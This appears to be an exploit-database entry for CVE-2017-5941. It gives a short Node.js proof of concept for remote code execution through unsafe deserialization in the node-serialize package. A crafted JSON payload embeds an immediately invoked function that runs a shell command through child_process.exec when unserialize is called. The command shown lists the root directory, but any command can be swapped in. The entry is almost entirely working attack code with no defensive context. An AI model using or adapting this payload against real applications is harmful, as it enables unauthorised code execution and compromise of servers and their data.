Author: OpSecX type: remote platform: linux port: date_added: 2018-08-27 date_updated: 2018-08-27 verified: 0 codes: CVE-2017-5941 tags: aliases: screenshot_url: application_url:
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);